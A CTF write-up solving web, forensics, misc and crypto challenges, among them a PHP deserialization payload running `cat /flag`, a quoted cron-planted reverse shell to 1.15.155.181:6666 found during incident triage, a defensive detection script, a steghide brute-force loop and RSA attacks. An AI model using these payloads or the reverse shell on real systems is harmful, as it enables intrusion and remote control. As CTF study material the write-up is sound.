catf1ag CTF 2022: two-hour AK (all-kill) writeup
From 12:50 to 14:40 in the afternoon, one challenge short of an AK........
WEB - Checked in!!! Can you play 2048?
WEB - easy_unser
O:7:"catf1ag":2:{s:6:"target";s:29:"<?php system("cat /flag"); ?>";}
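PWN/ATTACK - Detect and Remove
catf1ag{anomalous IP - shell file name - connection password of the PHP backdoor file - newly added suspicious username}
First look at the scheduled shell file: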
cat /etc/cr*
* * * * * /bin/bash /var/cache/apt/archives/partial/she11.sh
Having found this file, cat it:
bash -i >& /dev/tcp/1.15.155.181/6666 0>&1
The PHP backdoor can be found by looking inside /var/www/html/9.
For the username, just cat /etc/passwd and you can see the hacker_v user.
The final flag is catf1ag{1.15.155.181-she11.sh-cat_f1ag_666-hacker_v}
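The triage steps above, scripted as an added example (not part of the original writeup): it reports cron jobs that run scripts from cache or temp directories, /dev/tcp callbacks inside those scripts, and login-capable accounts outside a baseline. The cron entry and script body are the ones shown above; the passwd lines, the function names, SUSPICIOUS_DIRS and KNOWN_USERS are assumptions made for illustration.

```python
import re

# Cron entry and script body are the ones shown above; passwd lines are constructed.
CRONTAB = "* * * * * /bin/bash /var/cache/apt/archives/partial/she11.sh\n"
SCRIPTS = {"/var/cache/apt/archives/partial/she11.sh":
           "bash -i >& /dev/tcp/1.15.155.181/6666 0>&1\n"}
PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "hacker_v:x:1001:1001::/home/hacker_v:/bin/bash\n"
)
KNOWN_USERS = {"root"}  # assumed baseline of accounts allowed a login shell
# Assumed list of places where admin-written cron scripts do not normally live.
SUSPICIOUS_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/var/cache/")
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/([0-9A-Za-z.\-]+)/(\d+)")


def cron_commands(crontab):
    """Yield the text after the five schedule fields of each cron line."""
    for line in crontab.splitlines():
        fields = line.strip().split(None, 5)
        # Comments and VAR=value lines are skipped here.
        if len(fields) == 6 and not fields[0].startswith("#"):
            yield fields[5]


def triage(crontab, scripts, passwd, known_users):
    """Collect suspicious cron scripts, their callbacks, and unknown login users."""
    findings = {"cron_scripts": [], "callbacks": [], "new_login_users": []}
    for cmd in cron_commands(crontab):
        for path in re.findall(r"(?<!\S)(/\S+)", cmd):
            if path.startswith(SUSPICIOUS_DIRS):
                findings["cron_scripts"].append(path)
                # (host, port) pairs from bash /dev/tcp redirections
                findings["callbacks"] += DEV_TCP.findall(scripts.get(path, ""))
    for entry in passwd.splitlines():
        parts = entry.split(":")
        if len(parts) != 7:
            continue
        name, shell = parts[0], parts[6]
        if shell.endswith("sh") and name not in known_users:
            findings["new_login_users"].append(name)
    return findings


if __name__ == "__main__":
    print(triage(CRONTAB, SCRIPTS, PASSWD, KNOWN_USERS))
```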
MISC - Check-in
Opening the file in hexeditor shows base64 at the end; just decode it.
Y2F0ZjFhZyU3QmNjMDIwNjFlLWM4OGQtMTFlYy1iZWRiLTJjZjA1ZDk1NTQ1NSU3RA==
catf1ag{cc02061e-c88d-11ec-bedb-2cf05d955455}
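MISC - Strange Characters
Opening it gives this: bcwb4g`slyLMb?ftR~qh. I remembered that a previous competition had something similar. I tried XOR and it failed, so I tried a variant of XOR instead: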
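# Print in colour (ANSI escape sequence) without a trailing newline
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m', end='')
z1r0 = open('secret.txt','r').read()
# XOR each character with an incrementing key: 1, 2, 3, ...
j = 1
for i in z1r0:
    li(chr(ord(i) ^ j))
    j += 1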
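MISC - What is there 4 to see here
The 4 is probably related to the password.
The download is an image. I tried LSB and all sorts of other steganography, and finally tried steghide, which worked.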
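#!/bin/bash
# Try every numeric passphrase from ip_start to ip_end (inclusive)
ip_start=1
ip_end=9999
for ((i = ip_start; i <= ip_end; i++)); do
    # steghide exits 0 once the passphrase is correct, so stop there
    steghide extract -sf z1r0.jpeg -p "$i" && break
done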
catf1ag{198591b0-cbb0-11ec-bae7-2cf05d955455}
CRYPTO - How come there's an extra one
The old RSA routine... factor n with yafu, then just reuse an earlier script.
import libnum
import gmpy2
n=73551482761993440116378276402850976017673970117685879384712768054097267028974244867004238587658366463106703581107613883463180833706377915593443986550610497954246664378469651
e=65537
c=19088340804936031145050310701046663800140062626102387290922890724239533128878474005542684734507475562997222905703018409354867816494925059525377106444000231776165581716296665
# Prime factors of n recovered with yafu (n = p * q * r)
p = 4254843227
q = 2492374307
r = 6935768738605665705725288400892432256194550668863095515013942769049162888322407038880737120756913240675144540329112141837524407303580284917764285456453059
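# Euler's totient of n for three distinct primes
f = (p-1) * (q-1) * (r-1)
# Private exponent, then decrypt and convert the integer to bytes
d = gmpy2.invert(e, f)
m = pow(c, d, n)
print(libnum.n2s(int(m)))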
CRYPTO - High, Really High
n=12665183429254325580945372911206360706257079006954643947743121664454914089524916634832685040737214233687785325112424576039016165508146660290974828802710996880849185068704144690143915135774197938764858051298755021664568772363301699454954045374224914126975984844824184263131757665633324767483926757913457691303836308728657455890530401047029807132954324528617558308552469993676230342998368641468028935159530808062712526662606628371783359397956992056631816818089093174030024770769185589578769480295675152580623898653766068001693142399972844934629828827684074705324777912603273764730083438485014417283937379823019721736119
e=3
c=757846665709612710047622798901607696475966191486157677993807167873384365513676489731461790205050172225086169489914035089956311182880536480621453222154862896612205436092262339764782754486059223792491004753337631375452744373859969281558865685434771438386779285599911963081936786091339632323042550461240292308997539607661877861
high_m=911717829801678618100911351591485103708233783320853921932061644898078088242070960582223500287266227352502272
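Since high_m is given to us, this must be the known-high-bits-of-m attack.
I don't have this environment locally, so I ran the script directly on an online site. Don't know the high-bits-of-m attack? Just grab any script from the web.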
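import binascii

def hexStr_to_str(hex_str):
    # Convert a hex string to the text it encodes
    hex_bytes = hex_str.encode('utf-8')
    str_bin = binascii.unhexlify(hex_bytes)
    return str_bin.decode('utf-8')

def phase2(high_m, n, c):
    # SageMath syntax: m = high_m + x, where x is the unknown low part of m
    R.<x> = PolynomialRing(Zmod(n), implementation='NTL')
    m = high_m + x
    # Small root of (high_m + x)^3 - c = 0 mod n (e = 3)
    M = m((m^3 - c).small_roots()[0])
    print(hexStr_to_str(hex(int(M))[2:]))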
n=12665183429254325580945372911206360706257079006954643947743121664454914089524916634832685040737214233687785325112424576039016165508146660290974828802710996880849185068704144690143915135774197938764858051298755021664568772363301699454954045374224914126975984844824184263131757665633324767483926757913457691303836308728657455890530401047029807132954324528617558308552469993676230342998368641468028935159530808062712526662606628371783359397956992056631816818089093174030024770769185589578769480295675152580623898653766068001693142399972844934629828827684074705324777912603273764730083438485014417283937379823019721736119
e=3
c=757846665709612710047622798901607696475966191486157677993807167873384365513676489731461790205050172225086169489914035089956311182880536480621453222154862896612205436092262339764782754486059223792491004753337631375452744373859969281558865685434771438386779285599911963081936786091339632323042550461240292308997539607661877861
high_m=911717829801678618100911351591485103708233783320853921932061644898078088242070960582223500287266227352502272
phase2(high_m, n, c)
CRYPTO - Shuan Q
Hex decoding yields only the first part.
Opening the file in vim reveals things like <200c>. This is Unicode Steganography with Zero-Width Characters, so decode it with that.
catf1ag{f4ef7dd6-cda1-11ec-860b-2cf05d955455}
WEB - Guess what kind of injection this is?
Time's up.